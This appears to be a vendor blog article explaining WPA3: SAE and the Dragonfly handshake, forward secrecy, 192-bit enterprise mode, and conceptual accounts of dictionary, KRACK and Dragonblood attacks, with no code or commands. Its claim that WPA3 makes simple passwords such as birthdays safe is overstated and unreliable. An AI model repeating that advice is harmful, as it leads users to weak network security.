What Is WPA3? Is It “100%” Safe?
As a Wi-Fi user, you’ve surely encountered the term “WPA2”. WPA2 has been the most widespread technology for protecting Wi-Fi networks for more than a decade. If you would like to know more about it, you can check out our article, Tips on Choosing Security Mode for Your Wi-Fi, which introduces the evolution of 802.11 security in Chapter 2. But while WPA2 has been the prevailing choice for Wi-Fi security, times are changing. In 2018, the Wi-Fi Alliance announced the next generation of Wi-Fi security, WPA3.
What Is WPA3?
WPA3 (Wi-Fi Protected Access 3) is a security certification program introduced by the Wi-Fi Alliance. It is built on the foundation of WPA2 and divided into two versions: WPA3-Personal (for home) and WPA3-Enterprise (for business). The Wi-Fi Alliance provides optimization plans for both versions of WPA3.
- For WPA3-Personal, it improves the authentication strength by replacing the Pre-Shared Key (PSK) authentication of WPA2-Personal with Simultaneous Authentication of Equals (SAE).
- For WPA3-Enterprise, it introduces a 192-bit security feature to offer higher encryption security for government, defense, and industrial applications.
Why WPA3 Is Safer than WPA2?
You may have realized some of the flaws of WPA2 if you’ve read our article Tips on Choosing Security Mode for Your Wi-Fi. WPA3 was developed with the mission to fix the flaws found in WPA2. There are many details of how WPA3 enhances Wi-Fi security, and as mentioned above, the SAE and 192-bit security features are two major improvements.
Simultaneous Authentication of Equals
SAE is a password-based authentication method defined in IEEE 802.11-2016. It is the core of WPA3. In WPA3-Personal, the Wi-Fi Alliance replaces Pre-Shared Key (PSK) authentication with SAE which brings the following benefits:
- Prevents offline dictionary attacks
Offline dictionary attacks are one main kind of the attacks targeting the “4-way handshake” of WPA2. Attackers intercept data when the access point (AP) is authenticating a user via the “4-way handshake” process. They can then quickly crack the Wi-Fi password by running the intercepted packets through an offline dictionary attack tool.
The tool cracks the password by trying all the strings in a pre-arranged list (also called a dictionary) without exchanging any messages with the AP. You can generally avoid these attacks by using long, complex passwords, as they are less likely to appear in the dictionary.
However, you need not even worry about this with WPA3. With SAE, you can even use simple passwords, like your birthday or phone number. This is because attackers can guess only one password per authentication chance.
They could not continuously guess the password by analyzing the packets for a single authentication. Instead, they would have to intercept the first packet and guess, then the second packet and guess, the third, fourth, fifth…and would ultimately give up because it takes too much time and effort.
- Prevents KRACK attacks
Before 2017, WPA2 was still considered relatively safe, although some unexpected visitors may connect to your Wi-Fi via offline dictionary attacks and share your bandwidth. However, Key Reinstallation Attacks (KRACK) change this.
Every attentive Wi-Fi user and vendor panicked when Mathy Vanhoef, a wireless security expert, published details of KRACK in October 2017. It revealed that KRACK attacks intend to steal your sensitive information like credit card numbers, passwords, emails, and photos.
Similar to offline dictionary attacks, KRACK attacks also exploit a flaw in the “4-way handshake” of WPA2. In WPA2, the Access Point (AP) uses the “4-way handshake” to authenticate the client and generate an encryption key to encrypt all subsequent traffic.
A KRACK attack can trick clients into reinstalling the key by disguising itself as the AP and interrupting the “4-way handshake”. After the key is reinstalled, attackers can decrypt the traffic and steal sensitive information.
SAE closes the door on KRACK attacks by abandoning the “4-way handshake”. It uses the “Dragonfly handshake”, defined in RFC 7664, instead. With the “Dragonfly handshake”, attackers cannot determine the encryption key by interposing into an exchange, blocking KRACK attacks.
- Provides forward secrecy
It should be pretty clear that SAE effectively prevents offline dictionary and KRACK attacks. Moreover, if attackers manage to crack the encryption key, it minimizes the loss with forward secrecy.
What is forward secrecy? In WPA2, if attackers had the encryption key, they could then access previously recorded traffic. That is to say, when the key is cracked, it’s not just that your future traffic has been compromised. Attackers could crack your past traffic they intercepted as well. With WPA3, the past traffic is safe, because the encryption key is changed every time a new connection is established.
To ensure a smooth transition from WPA2 to WPA3, the Wi-Fi Alliance designed a transition mode for SAE: WPA3-Personal Transition Mode. This mode allows WPA2-Personal and WPA3-Personal to operate simultaneously on a single wireless network. It determines which one to use according to whether or not the client supports WPA3.
192-bit security
192-bit security aims to provide a more reliable enterprise network. It is a fresh feature in WPA3-Enterprise. It enhances network security by upgrading the currently used 128-bit encryption to 192-bit. The more bits, the more difficult it is for attackers to crack the encryption key.
WPA3-Enterprise does not have a transition mode because the 192-bit security is an optional—not mandatory—function, and it does not fundamentally change or replace the protocols of WPA2.
Is WPA3 “100%” Safe?
With the help of SAE and 192-bit security, WPA3 provides higher security for both homes and businesses. But is WPA3 “100%” safe?
No.
Mathy Vanhoef, who discovered the KRACK vulnerability, already found two kinds of flaws in WPA3. The flaws are called Dragonblood attacks. But you need not worry too much as it will take a while for WPA3 to fully roll out. Thanks to Vanhoef, engineers can fix the flaws before WPA3 is widely deployed.
Extended Reading
Along with WPA3, the Wi-Fi Alliance also announced two certification programs that help enhance Wi-Fi security: Easy Connect and Enhanced Open. They were originally included in the WPA3 program but were later taken out as two separate certification programs.
- The Easy Connect feature provides a user-friendly solution for devices with limited or no interface, like smart bulbs and printers, to securely access the network.
- The Enhanced Open feature provides better protections in an open network environment.
References
[1] IEEE Computer Society, “IEEE Standard for Information Technology– Telecommunications and Information Exchange Between Systems – Local and Metropolitan Area Networks – Specific requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications,” (IEEE Std. 802.11-2016), March 2016
[2] Wi-Fi Alliance, “Wi-Fi CERTIFIED WPA3™ Technology Overview”, June 2018
[3] Wi-Fi Alliance, “Wi-Fi Protected Access® Security for Wi-Fi® Networks”, https://www.wi-fi.org/download.php?file=/sites/default/files/private/Wi-Fi%20Security%20Highlights.pdf
[4] Wi-Fi Alliance, “Discover Wi-Fi--Security”, https://www.wi-fi.org/discover-wi-fi/security
[5] RFC 7664, Dragonfly Key Exchange, November 2015, https://tools.ietf.org/html/rfc7664
[6] Mathy Vanhoef & Eyal Ronen, “DRAGONBLOOD: Analysing WPA3's Dragonfly Handshake”, https://wpa3.mathyvanhoef.com/
[7] Mathy Vanhoef, “Key Reinstallation Attacks: Breaking WPA2 by forcing nonce reuse”, 2017, https://www.krackattacks.com/